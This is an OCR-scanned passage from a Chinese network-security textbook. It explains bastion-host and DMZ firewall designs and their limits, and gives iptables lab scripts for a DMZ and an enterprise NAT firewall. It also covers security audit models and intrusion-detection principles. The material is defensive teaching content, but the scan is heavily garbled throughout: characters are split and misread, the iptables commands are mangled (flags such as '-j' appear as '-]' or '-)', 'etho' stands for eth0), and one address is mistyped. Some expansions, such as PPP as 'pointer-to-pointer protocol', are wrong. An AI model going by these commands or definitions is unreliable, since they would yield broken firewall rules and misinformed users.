。 它 是 专门 暴露 在 外 部 网 络 上 的 一 台 计 算 机 ,是 被 保护 的 内 部 网 络 在 外 网 上 的 代表 ， 
并 作为 进入 内 部 网 的 一 个 检查 点 。 

。 它 面 对 大 量 恶 意 攻击 的 风险 ,并 且 它 的 安全 对 于 建立 一 个 安全 周边 具有 重要 作用 ， 
因此 必须 强化 对 它 的 保护 ,使 风险 降 至 最 小 。 

。 它 通常 提供 公共 服务 ,如 邮件 服务 ,WWW 服务 .FTP 服务 .DNS 服务 等 。 

。 198 ， 


”堡垒 主 机 与 内 部 网 络 是 隔离 的 。 它 不 知道 内 部 主机 的 身份 认证 服务 和 正在 运行 的 
程序 等 细节 。 这 样 , 对 堡 公主 机 的 攻击 不 会 歌 及 内 部 网 络 。 
所 以 ,堡垒 主机 是 一 个 被 强化 的 .被 暴露 在 被 保护 网 络 外 部 的 .可 以 预防 进攻 的 计算 机 。 
(2) 单 连 点 堡垒 主机 过 滤 式 防火 墙 
单 连 点 堡垒 主机 过 滤 式 防 火 墙 如 图 5. 3 所 示 。 它 实现 了 网 络 层 安 全 ( 包 过 滤 ) 和 应 用 层 
安全 (代理 ), 具 有 比 单纯 包 过 滤 更 高 的 安全 等 级 。 


图 5.3 单 连 点 堡垒 主机 过 滤 式 防火 墙 


通常 ,堡垒 主机 被 配置 在 过 滤 路 由 器 的 后 方 , 并 且 过 滤 规 则 的 配置 使 得 外 部 主机 只 能 访 
问 堡垒 主机 ,发 往 内 部 网 的 其 他 业务 流 则 全 部 被 阻塞 。 对 于 内 部 主机 来 说 ,由 于 内 部 主机 和 
堡垒 主机 同 在 一 个 内 部 网 络 上 ,所 以 机 构 的 安全 策略 可 以 决定 内 部 系统 允许 直接 访问 外 部 
网 ,还 是 要 求 使 用 配置 在 堡垒 主机 上 的 代理 服务 。 当 配置 路 由 器 的 过 滤 规 则 使 其 仅仅 接收 
来 自 堡垒 主机 的 内 部 业务 流 时 ,内 部 用 户 就 不 得 不 使 用 代理 服务 。 

主机 过 滤 防 火 墙 具 有 双重 保护 ,从 外 网 来 的 访问 只 能 访问 到 堡垒 主机 ,而 不 允许 访问 被 
保护 网 络 的 其 他 资源 ,有 较 高 的 安全 可 靠 性 。 并 且 主 机 过 滤 网 关 能 有 选择 地 允许 那些 可 以 
信赖 的 应 用 程序 通过 路 由 器 ,是 一 种 非常 灵活 的 防火 墙 。 但 是 它 要 求 考虑 堡垒 主机 和 路 由 
器 两 个 方面 的 安全 性 。 如 果 路 由 器 中 的 访问 控制 表 允 许 某 些 访问 通过 路 由 器 , 则 防火 墙 管 
理 员 不 仅 要 管理 堡垒 主机 中 的 访问 控制 表 , 而 且 要 管理 路 由 器 中 的 访问 控制 表 , 并 要 求 对 这 
两 个 部 件 仔细 配置 以 便 它 们 能 协调 工作 。 此 外 ,系统 的 灵活 性 也 会 导致 走 捷径 (例如 用 户 可 
能 试图 避 开 代理 服务 器 直接 与 路 由 器 建立 联系 ) 而 破坏 安全 性 。 

(3) 双 连 点 堡垒 主机 过 滤 式 防火 墙 

双 连 点 煲 垒 主机 过 滤 式 防火 墙 的 结构 如 图 5.4 所 示 。 它 比 单 连 点 堡垒 主机 过 滤 式 防火 
墙 有 更 高 的 安全 等 级 。 由 于 堡垒 主机 具有 两 个 网 络 接口 ,除了 外 部 用 户 可 以 直接 访问 信息 
服务 器 外 ,外 部 用 户 发 往 内 部 网 络 的 业务 流 和 内 部 系统 对 外 部 网 络 的 访问 都 不 得 不 经 过 堡 
又 主机 ,以 提高 附加 的 安全 性 。 

在 这 种 系统 中 ,由 于 堡垒 主机 成 为 外 部 网 络 访问 内 部 网 络 的 唯一 入口 ,所 以 对 内 部 网 络 
的 可 能 安全 威胁 都 集中 到 了 堡 公 主机 上 。 因 而 对 堡垒 主机 的 保护 强度 关系 到 整个 内 部 网 的 
安全 。 
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图 5.4 双 连 点 堡垒 主机 过 滤 式 防火 墙 


4. 屏蔽 子 网 (screened subnet) 防火 墙 


被 保护 网 络 和 Internet 之 间 设 置 一 个 独立 的 子 网 作为 防火 墙 , 就 是 子 网 过 滤 防 火 墙 。 
具体 的 配置 方法 是 在 过 滤 主 机 的 配置 上 再 加 上 一 个 路 由 器 ,形成 具有 外 部 路 由 过 滤器 、 内 部 
路 由 过 滤器 ,应 用 网 关 三 道 防线 的 过 滤 子 网 ,如 图 5. 5 所 示 。 


外 部 路 由 器 


图 5.5 子 网 过 滤 防 火 墙 配置 


在 子 网 过 滤 防 火 墙 中 ,外 部 过 滤 路 由 器 用 于 防范 通常 的 外 部 攻击 (如 源 地 址 欺骗 和 源 路 
由 攻击 ) ,并 管理 外 部 网 到 过 滤 子 网 的 访问 。 外 部 系统 只 能 访问 到 堡垒 主机 ,通过 保 垒 主机 
向 内 部 网 传送 数据 包 。 内 部 过 滤 路 由 器 管理 过 滤 子 网 与 内 部 网 络 之 间 的 访问 ,内 部 系统 只 
能 访问 到 保 垒 主机 ,通过 堡垒 主机 向 外 部 网 发 送 数据 包 。 简 单 地 说 ,任何 跨越 子 网 的 直接 访 
问 都 是 被 严格 禁止 的 。 从 而 在 两 个 路 由 器 之 间 定 义 了 一 个 * 非 军事 区 ”(demilitarized zone， 
DMZ)。 这 种 配置 的 防火 墙 具 有 最 高 的 安全 性 ,但 是 它 要 求 的 设备 和 软件 模块 较 多 ,价格 较 
贵 且 相当 复杂 。 


5.1.3 网 络 防火 墙 的 局 限 


1. 防火 墙 可 能 留 有 漏洞 


防火 墙 可 以 确定 哪些 内 部 服务 允许 外 部 访问 ,哪些 外 部 用 户 可 以 访问 所 允许 的 内 部 服 
务 ,哪些 外 部 服务 可 以 由 内 部 用 户 访问 。 为 了 发 挥 防火 墙 的 作用 ,出 入 的 信息 必须 经 过 防火 
墙 , 被 授权 的 信息 才能 通过 。 
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实际 上 ,防火 墙 往往 会 留 有 漏洞 。 如 图 5. 6 所 示 ,如 果 内 部 网 络 中 有 一 个 未 加 限制 的 拨 
出 ,内 部 网 络 用 户 就 可 以 (用 向 ISP 购买 等 方式 ) 通 过 SLIP(serial line Internet protocol, 串 
行 链 路 网 际 协议 ) 或 PPP(pointer-to-pointer protocol, 点 到 点 协议 ) 与 ISP 直接 连接 ,从 而 化 
过 防火 墙 。 


图 5.6 防火 墙 的 漏洞 


由 于 防火 墙 依赖 于 口令 ,所 以 防火 墙 不 能 防范 黑客 对 口令 的 攻击 。 


2. 防火 墙 不 能 防止 内 部 出 卖 性 攻击 或 内 部 误 操作 


显然 , 当 内 部 人 员 将 敏感 数据 或 文件 复制 在 优盘 等 移动 存储 设备 上 提供 给 外 部 攻击 者 
时 ,防火墙 是 无 能 为 力 的 。 此 外 ,防火 墙 也 不 能 防范 黑客 有 可 能 伪装 成 管理 人 员 或 新 职工 ， 
以 骗取 没有 防范 心理 的 用 户 的 口令 或 假 用 他 们 的 临时 访问 权限 实施 的 攻击 。 


3. 防火 墙 不 能 防止 数据 驱动 式 的 攻击 


有 些 数据 表面 上 看 起 来 无 害 , 可 是 当 它们 被 邮寄 或 复制 到 内 部 网 的 主机 中 后 ,就 可 能 会 
发 起 攻击 ,或 为 其 他 和 人 侵 准 备 好 条 件 ,这 种 攻击 就 称 为 数据 驱动 式 攻 击 。 防 火 墙 无 法 防御 这 
类 攻击 。 


实验 16 为 一 个 组 织 配置 带 有 DMZ 防火 墙 


1. 实验 目的 


(1) 了 解 DMZ 防火 墙 的 功能 。 
(2) 掌握 进行 DMZ 防火 墙 配置 和 测试 的 方法 。 


2. 实验 内 容 

(1) 针对 一 个 组 织 进行 DMZ 防火 墙 配置 。 
(2) 对 配置 后 的 DMZ 防火 墙 进行 测试 。 
3. 实验 范例 一 : 用 Linux 构建 DMZ 


按照 白 名 单 原则 ,防火墙 默认 禁止 所 有 数据 通信 ,然后 再 打开 必要 的 通信 。 所 以 在 防火 
墙 脚本 的 最 初 ,需要 清空 系统 原 有 的 规则 ,然后 将 INPUT、OUTPUT、FORWARD 的 默认 
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规则 设置 为 丢弃 所 有 数据 包 。 


Drop every packet 

/sbin/iptables-P INPUT DROP 
/sbin/iptables-P OUTPUT DROP 
/sbin/iptables-P FORWARD DROP 


下 面 介 绍 在 Linux 中 进行 6 种 访问 规则 设置 的 方法 。 

(1) 内 网 可 以 访问 外 网 。 对 应 的 防火 墙 脚本 片段 如 下 : 

/sbin/iptables-t nat-A POSTROUTING-s [内 网 地 址 ]-d [外 网 地 址 ]-o etho-j SNAT--to [NAT 的 真 

实 IP] 

当 数 据 从 连接 外 网 的 eth0 流出 时 ,要 将 来 自 内 网 的 数据 包 的 源 地 址 改 成 Internet 上 的 
真实 IP, 这 样 才能 和 外 网 的 主机 进行 通信 。[NAT 的 真实 IP] 表 示 分 配给 NAT 用 户 的 真 
实 IP, 有 几 个 就 写 几 个 ,以 空格 分 开 ,但 至 少 要 写 一 个 。 

(2) 内 网 可 以 访问 DMZ。 对 应 的 防火 墙 脚本 片段 如 下 : 

/sbin/iptables-A FORWARD-s [内 网 地 址 ]-d [DMZ 地 址 ]-i eth2-j ACCEPT 


以 上 命令 允许 所 有 来 自 内 网 .目的 地 为 DMZ 的 数据 包 通 过 。 
(3) 外 网 不 能 访问 内 网 。 对 应 的 防火 墙 脚本 片段 如 下 : 


sbin/iptables-t nat-A PREROUTING-s [外 网 地 址 ]-d [内 网 地 址 ]-i etho-j DROP 


以 上 命令 将 来 自 外 网 去 往 内 网 的 数据 包 全 部 丢弃 。 

(4) 外 网 可 以 访问 DMZ。 为 了 保护 DMZ 中 的 服务 器 ,外 网 对 DMZ 的 访问 也 要 加 以 限 
制 。 通 常 的 思路 是 ,只 允许 外 网 访问 DMZ 中 服务 器 所 提供 的 特定 服务 ,比如 HTTP。 对 应 
的 防火 墙 脚本 片段 如 下 : 

/sbin/iptables-t nat-A PREROUTING-p tcp--dport 80-d [分 配给 HTTP 服务 器 的 Internet 上 的 真实 

IPjJ-s [外 网 地 址 ]-i eth0-) DNAT--to [HTTP 服务 器 的 实际 IP] 

/sbin/iptables-A FORWARD-p tcp-s [外 网 地 址 ]-d [HTTP 服务 器 的 实际 IP]-i eth0--dport 80-j AC- 

CEPT 

/sbin/iptables-A FORWARD-p tcp-d [外 网 地 址 ]-s LHTTP 服务 器 的 实际 IPJ-i ethl--sport 80 ! 一 

syn-] ACCEPT 

/sbin/iptables-t nat-A PREROUTING-s [外 网 地 址 ]-d [DMZ 地 址 ]-i eth0-} DROP 

该 防火 墙 脚本 片段 将 开放 HTTP 服务 ,使 得 只 有 访问 DMZ 中 HTTP 服务 的 数据 包 才 
能 通过 防火 墙 。 

(5) DMZ 不 能 访问 内 网 。 对 应 的 防火 墙 脚本 片段 如 下 : 

/sbin/iptables-A FORWARD-s [LDMZ 地 址 ]-d [内 网 地 址 ]-i ethl-j DROP 


以 上 命令 将 丢弃 所 有 从 DMZ 到 内 网 的 数据 包 。 
(6) DMZ 不 能 访问 外 网 。 对 应 的 防火 墙 脚本 片段 如 下 : 
/sbin/iptables-t nat-A POSTROUTING-p tcp--dport 25-d [外 网 地 址 ]-s [邮件 服务 器 的 IP]-o eth0-j 
SNAT--to [分 配给 SMTP 服务 器 的 Internet 上 的 真实 IP] 
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/sbin/iptables-A FORWARD-p tcp-s [邮件 服务 器 的 IPj-d [外 网 地 址 ]-i ethl 一 dport 25-j ACCEPT 

/sbin/iptables-A FORWARD-p tcp-d [邮件 服务 器 的 IP]-s [外 网 地 址 ]-i eth0sport 25 ! 一 synm- 

j ACCEPT 

以 上 命令 先 允 许 DMZ 中 邮件 服务 器 连接 外 网 的 SMTP 服务 端口 (25) ,然后 禁止 其 他 
从 DMZ 发 往外 网 的 数据 包 。 

在 实际 应 用 中 ,需要 根据 具体 情况 进行 设置 。 只 要 设置 得 当 ,Linux 也 能 成 为 很 好 的 防 
火 墙 。 但 是 ,无 论 何 种 防火 墙 都 只 能 提供 有 限 的 保护 。 设 置 好 防火 墙 不 等 于 网 络 就 是 安全 
的 ,关键 在 于 综合 运用 各 种 安全 手段 。 


4. 实验 范例 二 : 构建 一 个 企业 代理 防火 墙 


(1) 配置 需求 说 明 

假如 公司 需要 Internet 接 人 ,由 ISP 分 配 IP 地 址 202. 112. 133. 119 ,采用 iptables 作为 
NAT 服务 器 接 人 网 络 , 内 部 采用 192. 168. 0. 0/24 地 址 ,外 部 采用 202. 112. 133. 119 地 址 。 
为 确保 安全 需要 配置 防火 墙 功能 ,要 求 内 部 仅 能 访问 Web、DNS、mail 这 3 种 服务 ;内 部 
Web 服务 器 192. 168. 0. 100 通过 端口 映射 的 方式 对 外 提供 服务 。 网 络 拓扑 见 图 5.7 所 示 。 


I = 


防火 墙 /NAT 服 务 器 | 


图 5.7 一 个 企业 代理 防火 墙 的 拓扑 结构 


用 集线器 或 交换 机 将 地 址 为 192. 168. 0.0/24 的 内 部 局 域 网 连 成 普通 以 太 网 ,整个 局 域 
网 通过 Linux 接 人 服务 器 (作为 防火 墙 及 NAT 服务 器 ) 接 入 外 网 。 该 接 入 服务 器 的 etho 接 
口 连接 外 网 ,IP 地 址 为 202. 112. 133. 119。ethl 接口 连 局 域 网 ,IP 地 址 为 192. 168. 0.1; 局 
域 网 内 有 一 台 Web 服务 器 ,IP 地 址 为 192. 168. 0. 100。 

(2) 配置 方案 

要 使 用 iptables ,还 必须 载 人 相关 模块 ,使 用 以 下 命令 载 人 相关 模块 : 


# modprobe iptable_tables 


modprobe 命令 会 自动 载 人 指定 模块 及 其 相关 模块 ;iptable_filter 模块 会 在 运行 时 自动 
载 人 。 


/sbin/iptables-P FORWARD DROP # 设 置 默认 策略 ,丢弃 所 有 除 允 许 之 外 的 从 内 网 来 的 包 
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QO@ Web 配置 


井 允 许 从 内 网 来 的 协议 为 TCP 或 UDP, 且 目的 端口 为 80 的 包 通 过 , 即 允 许 内 网 的 客户 端 向 外 网 的 
Web 服务 器 发 送 请 求 
iptables-A FORWARD-i eth0-p tcp-dport 80-] ACCEPT 
iptables-A FORWARD-i eth0-p udp-dport 80-j ACCEPT 
# 通 过 NAT 将 内 网 了 转换 为 外 网 卫 , 隐 藏 内 部 网 络 
iptables-t nat-A POSTROUTING-o eth0-p tcp-dport 80-j SNAT—to-source 202. 112. 133. 119 
iptables-t nat-A POSTROUTING-o etho-p udp-dport 80-j SNAT-to-source 202. 112. 133. 119 


@ DNS 配置 


# 人 允许 从 内 网 来 的 协议 为 TCP 或 UDP 且 目 的 端口 为 53 的 包 通过 , 即 允 许 内 网 用 户 访问 DNS 服务 
iptables-A FORWARD-i etho-p tcp-dport 53-j ACCEPT 

iptables-A FORWARD-i eth0-p udp-dport 53-j ACCEPT 

# 通 过 NAT 将 内 网 IP 转换 为 外 网 IP, 隐 藏 内 部 网 络 

iptables-t nat-A POSTROUTING-o eth0-p udp-dport 53-j SNAT-to-source 202. 112. 133. 119 
iptables-t nat-A POSTROUTING-o eth0-p tcp-dport 53-j SNAT-to-source 202. 112. 133. 119 


@ mail 


# SMTP 允许 从 内 网 来 的 协议 为 TCP 或 UDP 且 目 的 端口 为 25 的 包 通 过 , 即 允 许 内 网 用 户 访问 协议 
为 SMTP 的 邮件 服务 

iptables-A FORWARD-i eth0-p tcp--dport 25-j) ACCEPT 

iptables-A FORWARD-i eth0-p udp—dport 25-} ACCEPT 

# 通 过 NAT 将 内 网 IP 转换 为 外 网 耳 ,隐藏 内 部 网 络 

iptables-t nat-A POSTROUTING-o eth0-p tcp-dport 25-j SNAT-to-source 202. 112. 133. 119 
iptables-t nat-A POSTROUTING-o eth0-p udp-dport 25-j SNAT-to-source 202. 112. 133. 119 

# POP3 允许 从 内 网 来 的 协议 为 TCP 或 UDP, 且 目的 端口 为 110 的 包 通 过 , 即 允 许 内 网 用 户 访问 协 
议 POP3 的 邮件 服务 

iptables-A FORWARD-i eth0-p tcp-dport 110-} ACCEPT 

iptables-A FORWARD-i eth0-p udp-dport 110-j ACCEPT 

# 通 过 NAT 将 内 网 IP 转换 为 外 网 耳 , 隐 藏 内 部 网 络 

iptables-t nat-A POSTROUTING-o eth0-p tcp-dport 110-j SNAT-to-source 202. 112. 133. 119 
iptables-t nat-A POSTROUTING-o eth0-p udp-dport 110-j SNAT-to-source 202. 112. 133. 119 


@ Web 服务 配置 


# 目的 地 址 转换 ,将 发 给 网 关 的 协议 为 TCP 端口 为 80 的 包 转 给 内 网 的 Web 服务 器 

iptables-t nat-A PREROUTING-p tcp-d 202. 112. 133. 119-dport 80-} DNAT-to-destination 192. 168. 
0. 100 
# 源 地 址 转换 ,将 发 给 内 网 Web 服务 器 包 的 源 地 址 改 为 网 关 地 址 ,使 内 网 机 器 能 访问 Web 服务 器 
iptables-t nat-A POSTROUTING-p tcp-d 192. 168. 0. 100-dport 80-j SNAT-to-source 192. 169. 0. 1 
## 人 允许 到 内 网 Web 服务 器 和 从 内 网 Web 服务 器 来 的 包 通 过 

iptables-A FORWARD-o eth0-d 192. 168. 0. 100-p tcp-dport 80-j ACCEPT 

iptables-A FORWARD-i eth0-s 192. 168. 0. 100-p tcp-sport 80-m state ESTABLISHED-) ACCEPT 


到 此 ,已 经 完成 了 需求 当中 的 所 有 要 求 。 
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5. 实验 准备 

(1) 收集 阅读 有 关 DMZ 防火 墙 配置 的 资料 ,了 解 进行 各 种 环境 下 进行 DMZ 防火 墙 配 
置 的 方法 和 配置 步骤 。 

(2) 选择 一 个 合适 组 织 , 画 出 其 网 络 拓扑 结构 ,设计 为 其 进行 DMZ 防火 墙 配置 的 环境 

(3) 设计 对 配置 好 的 DMZ 防火 墙 进行 测试 的 步骤 。 


6. 推荐 的 分 析 讨论 内 容 


(1) 总 结 带 有 DMZ 防火 墙 的 配置 要 点 。 
(2) 其 他 发 现 或 想到 的 问题 。 


5.2 信息 系统 安全 审计 和 报答 
5.2.1 安全 审计 及 其 分 类 


1. 安全 审计 的 功能 


安全 审计 是 信息 系统 安全 中 一 项 极为 重要 的 安全 服务 措施 。 它 有 如 下 功能 : 

(1) 记录 与 系统 安全 活动 有 关 的 全 部 或 部 分 信息 ; 

(2) 对 所 记录 的 信息 进行 分 析 、 评 价 审查, 发 现 系 统 的 安全 隐患 ; 

(3) 对 潜在 的 攻击 者 进行 威慑 或 警告 

(4) 出 现 安全 事故 后 ,追查 造成 安全 事故 的 原因 并 落实 对 安全 事故 负责 的 实体 或 机 构 ， 
为 信息 系统 的 安全 策略 的 调整 和 修改 提供 建议 。 

安全 审计 和 报警 不 可 分 割 。 安 全 审计 由 各 级 安全 管理 机 构 实施 并 管理 ,并 只 在 定义 的 
安全 策略 范围 内 提供 。 它 允许 对 安全 策略 的 充分 性 进行 评价 ,帮助 检测 安全 违规 ,对 潜在 的 
攻击 者 产生 威慑 。 但 是 ,安全 审计 不 直接 阻止 安全 违规 。 安 全 报警 是 由 个 人 或 进程 发 出 的 ， 
一 般 在 安全 相关 事件 达到 某 一 或 一 些 预 定义 阔 值 时 发 出 。 这 些 事件 中 ,一些 是 需要 立即 采 
取 矫 正 行动 , 另 一 些 是 有 进一步 研究 价值 的 事件 。 

美国 国家 标准 《可 信 计 算 机 系统 评估 超标 准 》(Trusted Computer System Evaluation 
Criteria) 给 出 的 定义 是 : 一 个 安全 的 系统 中 的 安全 审计 系统 是 对 系统 中 任 一 或 所 有 安全 相 
关 事件 进行 记录 、 分 析 和 再 现 的 处 理 系统 。 它 通过 对 一 些 重要 的 事件 进行 记录 ,从 而 在 系统 
发 现 错误 或 受到 攻击 时 能 定位 错误 和 找到 攻击 成 功 的 原因 ,并 且 是 事故 后 调查 取证 的 基础 ， 
当然 也 是 对 信息 系统 的 信心 保证 。 


2. 安全 审计 的 类 型 


(1) 根据 审计 的 对 象 分 类 
根据 审计 的 对 象 , 安 全 审计 可 以 分 为 以 下 一 些 类 型 ; 
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。 操作 系统 的 审计 ; 

。 应 用 系统 的 审计 ; 

。 设备 的 审计 ; 

。 网 络 应 用 的 审计 。 

(2) 审计 的 关键 部 位 
通常 审计 的 关键 部 位 有 : 

。 对 来 自 外 部 攻击 的 审计 ; 
。 对 来 自 内 部 攻击 的 审计 ; 
。 对 电子 数据 的 安全 审计 。 


5.2.2 安全 审计 模型 


安全 审计 由 检测 /分 辨 .报警 .记录 、 分 析 、 聚 集 . 生 成 报告 .归档 等 过 程 实现 。 这 些 过 程 
组 成 如 图 5. 8 所 示 的 安全 审计 模型 。 


款 旭 由 内 


图 5.8 安全 审计 模型 


下 面 分 别 介绍 这 些 阶段 的 作用 。 
1. 检测 /分 辨 


检测 就 是 确定 已 经 发 生 的 安全 可 能 事件 以 及 安全 相关 事件 。 辨 别 就 是 确定 是 否 要 把 某 
事件 记录 在 该 安全 线索 中 ,或 者 是 否 需要 产生 报警 。 


2. 报警 


报警 用 于 产生 一 个 安全 审计 警报 或 安全 审计 消息 ,以 便 启动 正确 的 行动 。 所 谓 “行动 ” 
是 指 下 列 行动 ， 

， 不 采取 任何 行动 ; 

。 启动 恢复 行动 ; 
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。 局 动 恢 复 行动 并 产生 一 个 安全 审计 消息 。 

3. 分 析 

分 析 是 确定 安全 事件 的 类 型 ,以 确定 合适 的 行动 。 
4. 聚集 


聚集 阶段 的 功能 是 将 分 布 式 安全 审计 记录 汇集 成 单个 的 安全 审计 线索 ,以 便 对 入 侵 进 
行 评估 ,追溯 潜在 的 攻击 源 。 这 个 过 程 由 审计 跟踪 检验 器 完成 。 


5. 生成 报告 


从 安全 审计 线索 中 产生 出 审计 报告 。 安 全 报告 的 主要 内 容 有 : 
。 描述 安全 事件 造成 的 破坏 程度 ; 

。 指出 授权 用 户 利 用 其 权力 以 不 正当 方式 使 用 过 的 资源 ; 

。 对 安全 事件 进行 评估 ,指出 应 当 采 取 的 恢复 行动 。 


6. 归档 


归档 是 对 安全 跟踪 的 某 些 记录 建立 档案 ,进行 长 期 保存 。 可 以 进行 本 地 归档 ,也 可 以 进 
行 远程 归档 。 


5.2.3 安全 审计 日 志 


审计 日 志 是 记录 信息 系统 安全 状态 和 问题 的 原始 数据 。 理 想 的 日 志 应 当 包 括 全 部 与 数 
据 以 及 系统 资源 相关 事件 的 记录 ,但 这 样 付出 的 代价 太 大 。 为 此 ,日 志 的 内 容 应 当 根 据 安全 
目标 和 操作 环境 单独 设计 。 典 型 的 日 志 内 容 有 : 
事件 的 性 质 : 数据 的 输入 和 输出 、 文 件 的 更 新 (改变 或 修改 ) 、 系 统 的 用 途 或 期 望 ; 

。 全 部 相关 标识 : 人 、 设 备 和 程序 ; 

。 有关 事件 的 信息 : 日 期 和 时 间 、 成 功 或 失败 、 涉 及 因素 的 授权 状态 、 转 换 次 数 、 系 统 
响应 、 项 目 更 新 地 址 、 建 立 及 更 新 或 删除 信息 的 内 容 、 使 用 的 程序 兼容 结果 和 参数 
检测 .侵权 步 又 等 。 对 大 量 生 成 的 日 志 要 适当 考虑 数据 的 保存 期 限 。 


5.3 人 侵 检 测 


5.3.1 入 侵 检 测 系统 及 其 功能 


入 侵 检 测 (intrusion detection) 就 是 对 入 侵 行为 的 发 觉 。 这 里 “入 侵 ”(intrusion) 是 一 个 
广义 的 概念 ,不 仅 包括 发 起 攻击 的 人 (包括 黑客 ) 取 得 超出 合法 权限 的 行为 ,也 包括 收集 漏洞 
信息 ,造成 拒绝 访问 (denial of service) 等 对 系统 造成 危害 的 行为 。 

和信 侵 检测 作为 一 种 积极 的 安全 防护 技术 ,提供 了 对 内 部 攻击 .外 部 攻击 和 误 操 作 的 实时 
保护 ,被 认为 是 防火 墙 后 面 的 第 二 道 安全 防线 。 具 体 来 说 ,入 侵 检测 系统 的 主要 功能 有 : 
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。 监视 并 分 析 用 户 和 系统 的 行为 ; 

。 审计 系统 配置 和 漏洞 ; 

。 评估 敏感 系统 和 数据 的 完整 性 ; 

。 识别 攻击 行为 .对 异常 行为 进行 统计 ; 

。 自动 收集 与 系统 相关 的 补丁 ; 

。 审计 、 识 别 . 跟 踪 违 反 安 全 法 规 的 行为 ; 

。 使 用 诱骗 服务 器 记录 黑客 行为 等 。 

人 侵 检 测 系统 (intrusion detection system，IDS) 是 进行 人 侵 检 测 的 软件 和 硬件 的 
组 合 


so 


5.3.2 入 侵 检 测 原理 


1. 实时 入 侵 检测 和 事后 入 侵 检 测 


实时 和 人 侵 检测 在 网 络 的 连接 过 程 中 进行 ,通过 攻击 识别 模块 对 用 户 当 前 的 操作 进行 分 
析 ,一 且 发 现 攻 击 迹 象 就 转 人 攻击 处 理 模块 ,如 立即 断 开 攻击 者 与 主机 的 连接 ,收集 证 据 或 
实施 数据 恢复 等 。 如 图 5. 9 所 示 ,这 个 检测 过 程 是 反复 循环 进行 的 。 


攻击 识别 模块 | 一 | _ 入侵 检测 监测 


攻击 处 理 模块 


图 5.9 实时 入 侵 检 测 过 程 


事后 人 侵 检测 是 根据 计算 机 系统 对 用 户 操作 所 做 的 历史 审计 记录 判断 是 否 发 生 了 攻击 
行为 ,如 果 有 , 则 转 入 攻击 处 理 模块 处 理 。 事 后 人 侵 检 测 通常 由 网 络 管理 人 员 定 期 或 不 定期 
地 进行 。 图 5. 10 为 事后 入 侵 检测 的 过 程 。 


历史 记录 
1 


攻击 识别 模块 一 一 | 入 侵 检 测 


攻击 处 理 模块 


图 5.10 事后 人 侵 检 测 的 过 程 
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2. 入 侵 检 测 系统 的 优点 及 其 局 限 


采用 入 侵 检 测 系统 和 漏洞 评估 工具 带 来 的 好 处 有 如 下 一 些 : 
。 提高 了 信息 系统 安全 体系 其 他 部 分 的 完整 性 ; 

。 提高 了 系统 的 监察 能 力 ; 

。 可 以 跟踪 用 户 从 进入 到 退出 的 所 有 活动 或 影响 ; 

。 能 够 识别 并 报告 数据 文件 的 改动 ; 

。 可 以 发 现 系统 配置 的 错误 ,并 能 在 必要 时 予以 改正 ; 

。 可 以 识别 特定 类 型 的 攻击 ,并 进行 报警 ,作出 防御 响应 ; 
。 可 以 使 管理 人 员 将 最 新 的 版 本 升级 添加 到 程序 中 ; 

。 允许 非 专 业 人 员 从 事 系统 安全 工作 ; 

。 可 以 为 信息 系统 安全 提供 指导 。 

但 是 ,与 其 他 任何 工具 一 样 , 和 人 侵 检 测 也 不 是 万 能 的 ,它们 的 使 用 存在 如 下 局 限 : 
。 在 无 人 干预 的 情形 下 ,无 法 执行 对 攻击 的 检测 ; 

。 无 法 感知 组 织 ( 公 司 ) 安 全 策略 的 内 容 ， 

不 能 弥补 网 络 协议 的 漏洞 

。 不 能 弥补 系统 提供 信息 的 质量 或 完整 性 问题 ; 

。 不 能 分 析 网 络 繁忙 时 的 所 有 事物 ; 

。 不 能 总 是 对 数据 包 级 的 攻击 进行 处 理 等 。 


5.3.3 入 侵 检测 系统 的 功能 结构 


入 侵 检 测 是 防火 墙 的 合理 补充 ,帮助 系统 对 付 来 自 外 部 或 内 部 的 攻击 ,扩展 了 系统 管理 
员 的 安全 管理 能 力 ( 如 安全 审计 ,监视 ,攻击 识别 及 其 响应 ) ,提高 了 信息 安全 基础 结构 的 完 
整 性 。 如 图 5. 11 所 示 , 人 侵 检 测 系统 的 主要 工作 就 是 从 信息 系统 的 若干 关键 点 上 收集 信 
息 ,然后 分 析 这 些 信 息 , 用 来 得 到 网 络 中 有 无 违反 安全 策略 的 行为 和 遭 到 袭击 的 迹象 。 
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图 5.11 入 侵 检测 系统 的 通用 模型 


这 个 入 侵 检 测 系 统 模 型 比较 粗略 ,但 是 它 表明 数据 收集 、 数 据 分 析 和 处 理 响 应 是 一 个 人 
侵 检测 系统 的 基本 功能 部 件 。 


1. 信息 收集 


入 侵 检测 的 第 一 步 是 在 信息 系统 的 一 些 关 键 点 上 收集 信息 。 这 些 信 息 就 是 入侵 检测 系 
统 的 输入 数据 。 
(1) 数据 收集 的 内 容 
入 侵 检测 系统 收集 的 数据 一 般 来 自如 下 4 个 方面 。 
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@ 主机 和 网 络 日 志文 件 

主机 和 网 络 日 志文 件 中 记录 了 各 种 行为 类 型 ,每 种 行为 类 型 又 包含 不 同 的 信息 ,例如 记 
录 “ 用 户 活动 ”类 型 的 日 志 , 包 含 登录 、 用 户 ID 改变 .用 户 对 文件 的 访问 、 授 权 和 认证 信息 等 
内 容 。 这 些 信息 包含 了 发 生 在 主机 和 网 络 上 的 不 寻常 和 不 期 望 活动 的 证 据 , 留 下 黑客 的 踪 
迹 。 通 过 查看 日 志文 件 , 能 够 发 现成 功 的 入 侵 或 人 侵 企图 ,并 很 快 地 启动 响应 的 应 急 响应 
程序 。 

@ 目录 和 文件 中 的 不 期 望 的 改变 

网 络 环境 中 的 文件 系统 包含 很 多 软件 和 数据 文件 ,其 中 包含 重要 信息 的 或 私密 数据 文 
件 。 这 些 文件 经 常 是 黑客 修改 或 破坏 的 目标 。 黑 客 经 常 蔡 换 、 修 改 和 破坏 他 们 获得 访问 权 
的 系统 上 的 文件 ,同时 为 了 隐蔽 系统 中 他 们 的 活动 痕迹 ,还 会 尽力 替换 系统 程序 或 修改 系统 
日 志文 件 。 因 此 ,目录 和 文件 中 的 不 期 望 的 改变 (包括 修改 .创建 和 删除 ) ,特别 是 那些 正常 
情况 下 限制 访问 的 对 象 ,往往 就 是 入 侵 产生 的 指示 和 信和 号。 

@@ 程序 执行 中 的 不 期 望 行为 

每 个 在 系统 上 执行 的 程序 由 一 个 到 多 个 进程 来 实现 ,每 个 进程 都 运行 在 特定 权限 的 环 
境 中 ,环境 控制 着 进程 可 访问 的 系统 资源 ,程序 和 数据 文件 等 。 操 作 执 行 的 方式 不 同 ,利用 
的 系统 资源 也 就 不 同 。 操 作 包 括 计 算 、 文 件 传输 、 设 备 以 及 与 网 络 间 其 他 进程 的 通信 。 黑 客 
可 能 会 将 程序 或 服务 的 运行 分 解 ,从 而 导致 它 的 失败 ,或 者 是 以 非 用 户 或 管理 员 意 图 的 方式 
